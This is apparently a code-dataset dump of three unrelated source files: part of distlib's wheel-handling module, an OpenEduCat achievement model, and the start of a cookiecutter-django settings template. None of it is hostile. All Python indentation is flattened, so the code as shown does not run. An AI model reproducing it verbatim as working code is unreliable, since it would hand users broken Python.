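# For illustration, 'pip-19.0.3-py2.py3-none-any.whl' parses as
# nm='pip', vn='19.0.3', py='py2.py3', bi='none', ar='any' (the build
# number group 'bn' is absent in this example).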
NAME_VERSION_RE = re.compile(r'''
(?P<nm>[^-]+)
-(?P<vn>\d+[^-]*)
(-(?P<bn>\d+[^-]*))?$
''', re.IGNORECASE | re.VERBOSE)
SHEBANG_RE = re.compile(br'\s*#![^\r\n]*')
SHEBANG_DETAIL_RE = re.compile(br'^(\s*#!("[^"]+"|\S+))\s+(.*)$')
SHEBANG_PYTHON = b'#!python'
SHEBANG_PYTHONW = b'#!pythonw'
if os.sep == '/':
to_posix = lambda o: o
else:
to_posix = lambda o: o.replace(os.sep, '/')
class Mounter(object):
def __init__(self):
self.impure_wheels = {}
self.libs = {}
def add(self, pathname, extensions):
self.impure_wheels[pathname] = extensions
self.libs.update(extensions)
def remove(self, pathname):
extensions = self.impure_wheels.pop(pathname)
for k, v in extensions:
if k in self.libs:
del self.libs[k]
def find_module(self, fullname, path=None):
if fullname in self.libs:
result = self
else:
result = None
return result
def load_module(self, fullname):
if fullname in sys.modules:
result = sys.modules[fullname]
else:
if fullname not in self.libs:
raise ImportError('unable to find extension for %s' % fullname)
result = imp.load_dynamic(fullname, self.libs[fullname])
result.__loader__ = self
parts = fullname.rsplit('.', 1)
if len(parts) > 1:
result.__package__ = parts[0]
return result
_hook = Mounter()
class Wheel(object):
"""
Class to build and install from Wheel files (PEP 427).
"""
wheel_version = (1, 1)
hash_kind = 'sha256'
def __init__(self, filename=None, sign=False, verify=False):
"""
Initialise an instance using a (valid) filename.
"""
self.sign = sign
self.should_verify = verify
self.buildver = ''
self.pyver = [PYVER]
self.abi = ['none']
self.arch = ['any']
self.dirname = os.getcwd()
if filename is None:
self.name = 'dummy'
self.version = '0.1'
self._filename = self.filename
else:
m = NAME_VERSION_RE.match(filename)
if m:
info = m.groupdict('')
self.name = info['nm']
# Reinstate the local version separator
self.version = info['vn'].replace('_', '-')
self.buildver = info['bn']
self._filename = self.filename
else:
dirname, filename = os.path.split(filename)
m = FILENAME_RE.match(filename)
if not m:
raise DistlibException('Invalid name or '
'filename: %r' % filename)
if dirname:
self.dirname = os.path.abspath(dirname)
self._filename = filename
info = m.groupdict('')
self.name = info['nm']
self.version = info['vn']
self.buildver = info['bn']
self.pyver = info['py'].split('.')
self.abi = info['bi'].split('.')
self.arch = info['ar'].split('.')
@property
def filename(self):
"""
Build and return a filename from the various components.
"""
if self.buildver:
buildver = '-' + self.buildver
else:
buildver = ''
pyver = '.'.join(self.pyver)
abi = '.'.join(self.abi)
arch = '.'.join(self.arch)
# replace - with _ as a local version separator
version = self.version.replace('-', '_')
return '%s-%s%s-%s-%s-%s.whl' % (self.name, version, buildver,
pyver, abi, arch)
@property
def exists(self):
path = os.path.join(self.dirname, self.filename)
return os.path.isfile(path)
@property
def tags(self):
for pyver in self.pyver:
for abi in self.abi:
for arch in self.arch:
yield pyver, abi, arch
@cached_property
def metadata(self):
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
info_dir = '%s.dist-info' % name_ver
wrapper = codecs.getreader('utf-8')
with ZipFile(pathname, 'r') as zf:
wheel_metadata = self.get_wheel_metadata(zf)
wv = wheel_metadata['Wheel-Version'].split('.', 1)
file_version = tuple([int(i) for i in wv])
if file_version < (1, 1):
fns = [WHEEL_METADATA_FILENAME, METADATA_FILENAME, 'METADATA']
else:
fns = [WHEEL_METADATA_FILENAME, METADATA_FILENAME]
result = None
for fn in fns:
try:
metadata_filename = posixpath.join(info_dir, fn)
with zf.open(metadata_filename) as bf:
wf = wrapper(bf)
result = Metadata(fileobj=wf)
if result:
break
except KeyError:
pass
if not result:
raise ValueError('Invalid wheel, because metadata is '
'missing: looked in %s' % ', '.join(fns))
return result
def get_wheel_metadata(self, zf):
name_ver = '%s-%s' % (self.name, self.version)
info_dir = '%s.dist-info' % name_ver
metadata_filename = posixpath.join(info_dir, 'WHEEL')
with zf.open(metadata_filename) as bf:
wf = codecs.getreader('utf-8')(bf)
message = message_from_file(wf)
return dict(message)
@cached_property
def info(self):
pathname = os.path.join(self.dirname, self.filename)
with ZipFile(pathname, 'r') as zf:
result = self.get_wheel_metadata(zf)
return result
def process_shebang(self, data):
m = SHEBANG_RE.match(data)
if m:
end = m.end()
shebang, data_after_shebang = data[:end], data[end:]
# Preserve any arguments after the interpreter
if b'pythonw' in shebang.lower():
shebang_python = SHEBANG_PYTHONW
else:
shebang_python = SHEBANG_PYTHON
m = SHEBANG_DETAIL_RE.match(shebang)
if m:
args = b' ' + m.groups()[-1]
else:
args = b''
shebang = shebang_python + args
data = shebang + data_after_shebang
else:
cr = data.find(b'\r')
lf = data.find(b'\n')
if cr < 0 or cr > lf:
term = b'\n'
else:
if data[cr:cr + 2] == b'\r\n':
term = b'\r\n'
else:
term = b'\r'
data = SHEBANG_PYTHON + term + data
return data
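# For illustration: a script beginning b'#!/usr/bin/python -O\n' is
# rewritten to start b'#!python -O\n' (interpreter replaced, trailing
# arguments preserved), while a script with no shebang at all gets
# b'#!python' prepended using the file's own line terminator.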
def get_hash(self, data, hash_kind=None):
if hash_kind is None:
hash_kind = self.hash_kind
try:
hasher = getattr(hashlib, hash_kind)
except AttributeError:
raise DistlibException('Unsupported hash algorithm: %r' % hash_kind)
result = hasher(data).digest()
result = base64.urlsafe_b64encode(result).rstrip(b'=').decode('ascii')
return hash_kind, result
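# The (kind, digest) pair is later joined as '%s=%s', matching the
# RECORD convention; for example, the digest of an empty byte string is
# 'sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU'.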
def write_record(self, records, record_path, base):
records = list(records) # make a copy for sorting
p = to_posix(os.path.relpath(record_path, base))
records.append((p, '', ''))
records.sort()
with CSVWriter(record_path) as writer:
for row in records:
writer.writerow(row)
def write_records(self, info, libdir, archive_paths):
records = []
distinfo, info_dir = info
hasher = getattr(hashlib, self.hash_kind)
for ap, p in archive_paths:
with open(p, 'rb') as f:
data = f.read()
digest = '%s=%s' % self.get_hash(data)
size = os.path.getsize(p)
records.append((ap, digest, size))
p = os.path.join(distinfo, 'RECORD')
self.write_record(records, p, libdir)
ap = to_posix(os.path.join(info_dir, 'RECORD'))
archive_paths.append((ap, p))
def build_zip(self, pathname, archive_paths):
with ZipFile(pathname, 'w', zipfile.ZIP_DEFLATED) as zf:
for ap, p in archive_paths:
logger.debug('Wrote %s to %s in wheel', p, ap)
zf.write(p, ap)
def build(self, paths, tags=None, wheel_version=None):
"""
Build a wheel from files in specified paths, and use any specified tags
when determining the name of the wheel.
"""
if tags is None:
tags = {}
libkey = list(filter(lambda o: o in paths, ('purelib', 'platlib')))[0]
if libkey == 'platlib':
is_pure = 'false'
default_pyver = [IMPVER]
default_abi = [ABI]
default_arch = [ARCH]
else:
is_pure = 'true'
default_pyver = [PYVER]
default_abi = ['none']
default_arch = ['any']
self.pyver = tags.get('pyver', default_pyver)
self.abi = tags.get('abi', default_abi)
self.arch = tags.get('arch', default_arch)
libdir = paths[libkey]
name_ver = '%s-%s' % (self.name, self.version)
data_dir = '%s.data' % name_ver
info_dir = '%s.dist-info' % name_ver
archive_paths = []
# First, stuff which is not in site-packages
for key in ('data', 'headers', 'scripts'):
if key not in paths:
continue
path = paths[key]
if os.path.isdir(path):
for root, dirs, files in os.walk(path):
for fn in files:
p = fsdecode(os.path.join(root, fn))
rp = os.path.relpath(p, path)
ap = to_posix(os.path.join(data_dir, key, rp))
archive_paths.append((ap, p))
if key == 'scripts' and not p.endswith('.exe'):
with open(p, 'rb') as f:
data = f.read()
data = self.process_shebang(data)
with open(p, 'wb') as f:
f.write(data)
# Now, stuff which is in site-packages, other than the
# distinfo stuff.
path = libdir
distinfo = None
for root, dirs, files in os.walk(path):
if root == path:
# At the top level only, save distinfo for later
# and skip it for now
for i, dn in enumerate(dirs):
dn = fsdecode(dn)
if dn.endswith('.dist-info'):
distinfo = os.path.join(root, dn)
del dirs[i]
break
assert distinfo, '.dist-info directory expected, not found'
for fn in files:
# comment out next suite to leave .pyc files in
if fsdecode(fn).endswith(('.pyc', '.pyo')):
continue
p = os.path.join(root, fn)
rp = to_posix(os.path.relpath(p, path))
archive_paths.append((rp, p))
# Now distinfo. Assumed to be flat, i.e. os.listdir is enough.
files = os.listdir(distinfo)
for fn in files:
if fn not in ('RECORD', 'INSTALLER', 'SHARED', 'WHEEL'):
p = fsdecode(os.path.join(distinfo, fn))
ap = to_posix(os.path.join(info_dir, fn))
archive_paths.append((ap, p))
wheel_metadata = [
'Wheel-Version: %d.%d' % (wheel_version or self.wheel_version),
'Generator: distlib %s' % __version__,
'Root-Is-Purelib: %s' % is_pure,
]
for pyver, abi, arch in self.tags:
wheel_metadata.append('Tag: %s-%s-%s' % (pyver, abi, arch))
p = os.path.join(distinfo, 'WHEEL')
with open(p, 'w') as f:
f.write('\n'.join(wheel_metadata))
ap = to_posix(os.path.join(info_dir, 'WHEEL'))
archive_paths.append((ap, p))
# Now, at last, RECORD.
# Paths in here are archive paths - nothing else makes sense.
self.write_records((distinfo, info_dir), libdir, archive_paths)
# Now, ready to build the zip file
pathname = os.path.join(self.dirname, self.filename)
self.build_zip(pathname, archive_paths)
return pathname
def skip_entry(self, arcname):
"""
Determine whether an archive entry should be skipped when verifying
or installing.
"""
# The signature file won't be in RECORD,
# and we don't currently do anything with it
# We also skip directories, as they won't be in RECORD
# either. See:
#
# https://github.com/pypa/wheel/issues/294
# https://github.com/pypa/wheel/issues/287
# https://github.com/pypa/wheel/pull/289
#
return arcname.endswith(('/', '/RECORD.jws'))
def install(self, paths, maker, **kwargs):
"""
Install a wheel to the specified paths. If kwarg ``warner`` is
specified, it should be a callable, which will be called with two
tuples indicating the wheel version of this software and the wheel
version in the file, if there is a discrepancy in the versions.
This can be used to issue any warnings or raise any exceptions.
If kwarg ``lib_only`` is True, only the purelib/platlib files are
installed, and the headers, scripts, data and dist-info metadata are
not written. If kwarg ``bytecode_hashed_invalidation`` is True, written
bytecode will try to use file-hash based invalidation (PEP-552) on
supported interpreter versions (CPython 3.7+, where PEP 552 applies).
The return value is a :class:`InstalledDistribution` instance unless
``options.lib_only`` is True, in which case the return value is ``None``.
"""
dry_run = maker.dry_run
warner = kwargs.get('warner')
lib_only = kwargs.get('lib_only', False)
bc_hashed_invalidation = kwargs.get('bytecode_hashed_invalidation', False)
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
data_dir = '%s.data' % name_ver
info_dir = '%s.dist-info' % name_ver
metadata_name = posixpath.join(info_dir, METADATA_FILENAME)
wheel_metadata_name = posixpath.join(info_dir, 'WHEEL')
record_name = posixpath.join(info_dir, 'RECORD')
wrapper = codecs.getreader('utf-8')
with ZipFile(pathname, 'r') as zf:
with zf.open(wheel_metadata_name) as bwf:
wf = wrapper(bwf)
message = message_from_file(wf)
wv = message['Wheel-Version'].split('.', 1)
file_version = tuple([int(i) for i in wv])
if (file_version != self.wheel_version) and warner:
warner(self.wheel_version, file_version)
if message['Root-Is-Purelib'] == 'true':
libdir = paths['purelib']
else:
libdir = paths['platlib']
records = {}
with zf.open(record_name) as bf:
with CSVReader(stream=bf) as reader:
for row in reader:
p = row[0]
records[p] = row
data_pfx = posixpath.join(data_dir, '')
info_pfx = posixpath.join(info_dir, '')
script_pfx = posixpath.join(data_dir, 'scripts', '')
# make a new instance rather than a copy of maker's,
# as we mutate it
fileop = FileOperator(dry_run=dry_run)
fileop.record = True # so we can rollback if needed
bc = not sys.dont_write_bytecode # Double negatives. Lovely!
outfiles = [] # for RECORD writing
# for script copying/shebang processing
workdir = tempfile.mkdtemp()
# set target dir later
# we default add_launchers to False, as the
# Python Launcher should be used instead
maker.source_dir = workdir
maker.target_dir = None
try:
for zinfo in zf.infolist():
arcname = zinfo.filename
if isinstance(arcname, text_type):
u_arcname = arcname
else:
u_arcname = arcname.decode('utf-8')
if self.skip_entry(u_arcname):
continue
row = records[u_arcname]
if row[2] and str(zinfo.file_size) != row[2]:
raise DistlibException('size mismatch for '
'%s' % u_arcname)
if row[1]:
kind, value = row[1].split('=', 1)
with zf.open(arcname) as bf:
data = bf.read()
_, digest = self.get_hash(data, kind)
if digest != value:
raise DistlibException('digest mismatch for '
'%s' % arcname)
if lib_only and u_arcname.startswith((info_pfx, data_pfx)):
logger.debug('lib_only: skipping %s', u_arcname)
continue
is_script = (u_arcname.startswith(script_pfx)
and not u_arcname.endswith('.exe'))
if u_arcname.startswith(data_pfx):
_, where, rp = u_arcname.split('/', 2)
outfile = os.path.join(paths[where], convert_path(rp))
else:
# meant for site-packages.
if u_arcname in (wheel_metadata_name, record_name):
continue
outfile = os.path.join(libdir, convert_path(u_arcname))
if not is_script:
with zf.open(arcname) as bf:
fileop.copy_stream(bf, outfile)
outfiles.append(outfile)
# Double check the digest of the written file
if not dry_run and row[1]:
with open(outfile, 'rb') as bf:
data = bf.read()
_, newdigest = self.get_hash(data, kind)
if newdigest != digest:
raise DistlibException('digest mismatch '
'on write for '
'%s' % outfile)
if bc and outfile.endswith('.py'):
try:
pyc = fileop.byte_compile(outfile,
hashed_invalidation=bc_hashed_invalidation)
outfiles.append(pyc)
except Exception:
# Don't give up if byte-compilation fails,
# but log it and perhaps warn the user
logger.warning('Byte-compilation failed',
exc_info=True)
else:
fn = os.path.basename(convert_path(arcname))
workname = os.path.join(workdir, fn)
with zf.open(arcname) as bf:
fileop.copy_stream(bf, workname)
dn, fn = os.path.split(outfile)
maker.target_dir = dn
filenames = maker.make(fn)
fileop.set_executable_mode(filenames)
outfiles.extend(filenames)
if lib_only:
logger.debug('lib_only: returning None')
dist = None
else:
# Generate scripts
# Try to get pydist.json so we can see if there are
# any commands to generate. If this fails (e.g. because
# of a legacy wheel), log a warning but don't give up.
commands = None
file_version = self.info['Wheel-Version']
if file_version == '1.0':
# Use legacy info
ep = posixpath.join(info_dir, 'entry_points.txt')
try:
with zf.open(ep) as bwf:
epdata = read_exports(bwf)
commands = {}
for key in ('console', 'gui'):
k = '%s_scripts' % key
if k in epdata:
commands['wrap_%s' % key] = d = {}
for v in epdata[k].values():
s = '%s:%s' % (v.prefix, v.suffix)
if v.flags:
s += ' %s' % v.flags
d[v.name] = s
except Exception:
logger.warning('Unable to read legacy script '
'metadata, so cannot generate '
'scripts')
else:
try:
with zf.open(metadata_name) as bwf:
wf = wrapper(bwf)
commands = json.load(wf).get('extensions')
if commands:
commands = commands.get('python.commands')
except Exception:
logger.warning('Unable to read JSON metadata, so '
'cannot generate scripts')
if commands:
console_scripts = commands.get('wrap_console', {})
gui_scripts = commands.get('wrap_gui', {})
if console_scripts or gui_scripts:
script_dir = paths.get('scripts', '')
if not os.path.isdir(script_dir):
raise ValueError('Valid script path not '
'specified')
maker.target_dir = script_dir
for k, v in console_scripts.items():
script = '%s = %s' % (k, v)
filenames = maker.make(script)
fileop.set_executable_mode(filenames)
if gui_scripts:
options = {'gui': True}
for k, v in gui_scripts.items():
script = '%s = %s' % (k, v)
filenames = maker.make(script, options)
fileop.set_executable_mode(filenames)
p = os.path.join(libdir, info_dir)
dist = InstalledDistribution(p)
# Write SHARED
paths = dict(paths) # don't change passed in dict
del paths['purelib']
del paths['platlib']
paths['lib'] = libdir
p = dist.write_shared_locations(paths, dry_run)
if p:
outfiles.append(p)
# Write RECORD
dist.write_installed_files(outfiles, paths['prefix'],
dry_run)
return dist
except Exception: # pragma: no cover
logger.exception('installation failed.')
fileop.rollback()
raise
finally:
shutil.rmtree(workdir)
def _get_dylib_cache(self):
global cache
if cache is None:
# Use native string to avoid issues on 2.x: see Python #20140.
base = os.path.join(get_cache_base(), str('dylib-cache'),
sys.version[:3])
cache = Cache(base)
return cache
def _get_extensions(self):
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
info_dir = '%s.dist-info' % name_ver
arcname = posixpath.join(info_dir, 'EXTENSIONS')
wrapper = codecs.getreader('utf-8')
result = []
with ZipFile(pathname, 'r') as zf:
try:
with zf.open(arcname) as bf:
wf = wrapper(bf)
extensions = json.load(wf)
cache = self._get_dylib_cache()
prefix = cache.prefix_to_dir(pathname)
cache_base = os.path.join(cache.base, prefix)
if not os.path.isdir(cache_base):
os.makedirs(cache_base)
for name, relpath in extensions.items():
dest = os.path.join(cache_base, convert_path(relpath))
if not os.path.exists(dest):
extract = True
else:
file_time = os.stat(dest).st_mtime
file_time = datetime.datetime.fromtimestamp(file_time)
info = zf.getinfo(relpath)
wheel_time = datetime.datetime(*info.date_time)
extract = wheel_time > file_time
if extract:
zf.extract(relpath, cache_base)
result.append((name, dest))
except KeyError:
pass
return result
def is_compatible(self):
"""
Determine if a wheel is compatible with the running system.
"""
return is_compatible(self)
def is_mountable(self):
"""
Determine if a wheel is asserted as mountable by its metadata.
"""
return True # for now - metadata details TBD
def mount(self, append=False):
pathname = os.path.abspath(os.path.join(self.dirname, self.filename))
if not self.is_compatible():
msg = 'Wheel %s not compatible with this Python.' % pathname
raise DistlibException(msg)
if not self.is_mountable():
msg = 'Wheel %s is marked as not mountable.' % pathname
raise DistlibException(msg)
if pathname in sys.path:
logger.debug('%s already in path', pathname)
else:
if append:
sys.path.append(pathname)
else:
sys.path.insert(0, pathname)
extensions = self._get_extensions()
if extensions:
if _hook not in sys.meta_path:
sys.meta_path.append(_hook)
_hook.add(pathname, extensions)
def unmount(self):
pathname = os.path.abspath(os.path.join(self.dirname, self.filename))
if pathname not in sys.path:
logger.debug('%s not in path', pathname)
else:
sys.path.remove(pathname)
if pathname in _hook.impure_wheels:
_hook.remove(pathname)
if not _hook.impure_wheels:
if _hook in sys.meta_path:
sys.meta_path.remove(_hook)
def verify(self):
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
data_dir = '%s.data' % name_ver
info_dir = '%s.dist-info' % name_ver
metadata_name = posixpath.join(info_dir, METADATA_FILENAME)
wheel_metadata_name = posixpath.join(info_dir, 'WHEEL')
record_name = posixpath.join(info_dir, 'RECORD')
wrapper = codecs.getreader('utf-8')
with ZipFile(pathname, 'r') as zf:
with zf.open(wheel_metadata_name) as bwf:
wf = wrapper(bwf)
message = message_from_file(wf)
wv = message['Wheel-Version'].split('.', 1)
file_version = tuple([int(i) for i in wv])
# TODO version verification
records = {}
with zf.open(record_name) as bf:
with CSVReader(stream=bf) as reader:
for row in reader:
p = row[0]
records[p] = row
for zinfo in zf.infolist():
arcname = zinfo.filename
if isinstance(arcname, text_type):
u_arcname = arcname
else:
u_arcname = arcname.decode('utf-8')
# See issue #115: some wheels have .. in their entries, but
# in the filename ... e.g. __main__..py ! So the check is
# updated to look for .. in the directory portions
p = u_arcname.split('/')
if '..' in p:
raise DistlibException('invalid entry in '
'wheel: %r' % u_arcname)
if self.skip_entry(u_arcname):
continue
row = records[u_arcname]
if row[2] and str(zinfo.file_size) != row[2]:
raise DistlibException('size mismatch for '
'%s' % u_arcname)
if row[1]:
kind, value = row[1].split('=', 1)
with zf.open(arcname) as bf:
data = bf.read()
_, digest = self.get_hash(data, kind)
if digest != value:
raise DistlibException('digest mismatch for '
'%s' % arcname)
def update(self, modifier, dest_dir=None, **kwargs):
"""
Update the contents of a wheel in a generic way. The modifier should
be a callable which expects a dictionary argument: its keys are
archive-entry paths, and its values are absolute filesystem paths
where the contents the corresponding archive entries can be found. The
modifier is free to change the contents of the files pointed to, add
new entries and remove entries, before returning. This method will
extract the entire contents of the wheel to a temporary location, call
the modifier, and then use the passed (and possibly updated)
dictionary to write a new wheel. If ``dest_dir`` is specified, the new
wheel is written there -- otherwise, the original wheel is overwritten.
The modifier should return True if it updated the wheel, else False.
This method returns the same value the modifier returns.
"""
def get_version(path_map, info_dir):
version = path = None
key = '%s/%s' % (info_dir, METADATA_FILENAME)
if key not in path_map:
key = '%s/PKG-INFO' % info_dir
if key in path_map:
path = path_map[key]
version = Metadata(path=path).version
return version, path
def update_version(version, path):
updated = None
try:
v = NormalizedVersion(version)
i = version.find('-')
if i < 0:
updated = '%s+1' % version
else:
parts = [int(s) for s in version[i + 1:].split('.')]
parts[-1] += 1
updated = '%s+%s' % (version[:i],
'.'.join(str(i) for i in parts))
except UnsupportedVersionError:
logger.debug('Cannot update non-compliant (PEP-440) '
'version %r', version)
if updated:
md = Metadata(path=path)
md.version = updated
legacy = not path.endswith(METADATA_FILENAME)
md.write(path=path, legacy=legacy)
logger.debug('Version updated from %r to %r', version,
updated)
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
info_dir = '%s.dist-info' % name_ver
record_name = posixpath.join(info_dir, 'RECORD')
with tempdir() as workdir:
with ZipFile(pathname, 'r') as zf:
path_map = {}
for zinfo in zf.infolist():
arcname = zinfo.filename
if isinstance(arcname, text_type):
u_arcname = arcname
else:
u_arcname = arcname.decode('utf-8')
if u_arcname == record_name:
continue
if '..' in u_arcname:
raise DistlibException('invalid entry in '
'wheel: %r' % u_arcname)
zf.extract(zinfo, workdir)
path = os.path.join(workdir, convert_path(u_arcname))
path_map[u_arcname] = path
# Remember the version.
original_version, _ = get_version(path_map, info_dir)
# Files extracted. Call the modifier.
modified = modifier(path_map, **kwargs)
if modified:
# Something changed - need to build a new wheel.
current_version, path = get_version(path_map, info_dir)
if current_version and (current_version == original_version):
# Add or update local version to signify changes.
update_version(current_version, path)
# Decide where the new wheel goes.
if dest_dir is None:
fd, newpath = tempfile.mkstemp(suffix='.whl',
prefix='wheel-update-',
dir=workdir)
os.close(fd)
else:
if not os.path.isdir(dest_dir):
raise DistlibException('Not a directory: %r' % dest_dir)
newpath = os.path.join(dest_dir, self.filename)
archive_paths = list(path_map.items())
distinfo = os.path.join(workdir, info_dir)
info = distinfo, info_dir
self.write_records(info, workdir, archive_paths)
self.build_zip(newpath, archive_paths)
if dest_dir is None:
shutil.copyfile(newpath, pathname)
return modified
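# A minimal sketch of a modifier usable with Wheel.update() (the names
# below are hypothetical, not part of distlib). The callable receives a
# mapping of archive-entry paths to extracted filesystem paths and
# returns True if it changed anything:
#
# def strip_trailing_whitespace(path_map, **kwargs):
# changed = False
# for arcname, path in path_map.items():
# if not arcname.endswith('.py'):
# continue
# with open(path, 'rb') as f:
# data = f.read()
# cleaned = b'\n'.join(l.rstrip() for l in data.split(b'\n'))
# if cleaned != data:
# with open(path, 'wb') as f:
# f.write(cleaned)
# changed = True
# return changed
#
# Wheel('pkg-1.0-py2.py3-none-any.whl').update(strip_trailing_whitespace)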
def compatible_tags():
"""
Return (pyver, abi, arch) tuples compatible with this Python.
"""
versions = [VER_SUFFIX]
major = VER_SUFFIX[0]
for minor in range(sys.version_info[1] - 1, - 1, -1):
versions.append(''.join([major, str(minor)]))
abis = []
for suffix, _, _ in imp.get_suffixes():
if suffix.startswith('.abi'):
abis.append(suffix.split('.', 2)[1])
abis.sort()
if ABI != 'none':
abis.insert(0, ABI)
abis.append('none')
result = []
arches = [ARCH]
if sys.platform == 'darwin':
m = re.match(r'(\w+)_(\d+)_(\d+)_(\w+)$', ARCH)
if m:
name, major, minor, arch = m.groups()
minor = int(minor)
matches = [arch]
if arch in ('i386', 'ppc'):
matches.append('fat')
if arch in ('i386', 'ppc', 'x86_64'):
matches.append('fat3')
if arch in ('ppc64', 'x86_64'):
matches.append('fat64')
if arch in ('i386', 'x86_64'):
matches.append('intel')
if arch in ('i386', 'x86_64', 'intel', 'ppc', 'ppc64'):
matches.append('universal')
while minor >= 0:
for match in matches:
s = '%s_%s_%s_%s' % (name, major, minor, match)
if s != ARCH: # already there
arches.append(s)
minor -= 1
# Most specific - our Python version, ABI and arch
for abi in abis:
for arch in arches:
result.append((''.join((IMP_PREFIX, versions[0])), abi, arch))
# where no ABI / arch dependency, but IMP_PREFIX dependency
for i, version in enumerate(versions):
result.append((''.join((IMP_PREFIX, version)), 'none', 'any'))
if i == 0:
result.append((''.join((IMP_PREFIX, version[0])), 'none', 'any'))
# no IMP_PREFIX, ABI or arch dependency
for i, version in enumerate(versions):
result.append((''.join(('py', version)), 'none', 'any'))
if i == 0:
result.append((''.join(('py', version[0])), 'none', 'any'))
return set(result)
COMPATIBLE_TAGS = compatible_tags()
del compatible_tags
def is_compatible(wheel, tags=None):
if not isinstance(wheel, Wheel):
wheel = Wheel(wheel) # assume it's a filename
result = False
if tags is None:
tags = COMPATIBLE_TAGS
for ver, abi, arch in tags:
if ver in wheel.pyver and abi in wheel.abi and arch in wheel.arch:
result = True
break
return result
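# Usage sketch (illustrative filename): checking a wheel against the
# tags computed for the running interpreter.
#
# w = Wheel('pip-19.0.3-py2.py3-none-any.whl')
# print(w.name, w.version, list(w.tags))
# print(is_compatible(w)) # True, since the 'py2'/'py3' tags match any Python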
| bsd-2-clause |
mohamedhagag/community-addons | openeducat_erp/op_achievement/op_achievement.py | 1 | 1565 | # -*- coding: utf-8 -*-
###############################################################################
#
# Tech-Receptives Solutions Pvt. Ltd.
# Copyright (C) 2009-TODAY Tech-Receptives(<http://www.techreceptives.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from openerp import models, fields
class OpAchievement(models.Model):
_name = 'op.achievement'
_rec_name = 'student_id'
student_id = fields.Many2one('op.student', 'Student', required=True)
faculty_id = fields.Many2one('op.faculty', 'Faculty', required=True)
achievement_type = fields.Many2one(
'op.achievement.type', 'Achievement Type', required=True)
description = fields.Text('Description', required=True)
achievement_date = fields.Date('Date', required=True)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
HellerCommaA/cookiecutter-django | {{cookiecutter.repo_name}}/config/settings/common.py | 8 | 9680 | # -*- coding: utf-8 -*-
"""
Django settings for {{cookiecutter.project_name}} project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (/a/b/myfile.py - 3 = /)
APPS_DIR = ROOT_DIR.path('{{ cookiecutter.repo_name }}')
env = environ.Env()
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
'crispy_forms', # Form layouts
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
# Apps specific for this project go here.
LOCAL_APPS = (
'{{ cookiecutter.repo_name }}.users', # custom users app
# Your stuff: custom apps go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
# (it is prepended by the production settings, not here)
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'sites': '{{ cookiecutter.repo_name }}.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# FIXTURE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
("""{{cookiecutter.author_name}}""", '{{cookiecutter.email}}'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
'default': env.db("DATABASE_URL", default="postgres://{% if cookiecutter.windows == 'y' %}localhost{% endif %}/{{cookiecutter.repo_name}}"),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
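# For reference, env.db() parses a twelve-factor style URL; an
# illustrative value (credentials are placeholders):
# DATABASE_URL=postgres://user:password@127.0.0.1:5432/{{cookiecutter.repo_name}}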
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = '{{ cookiecutter.timezone }}'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
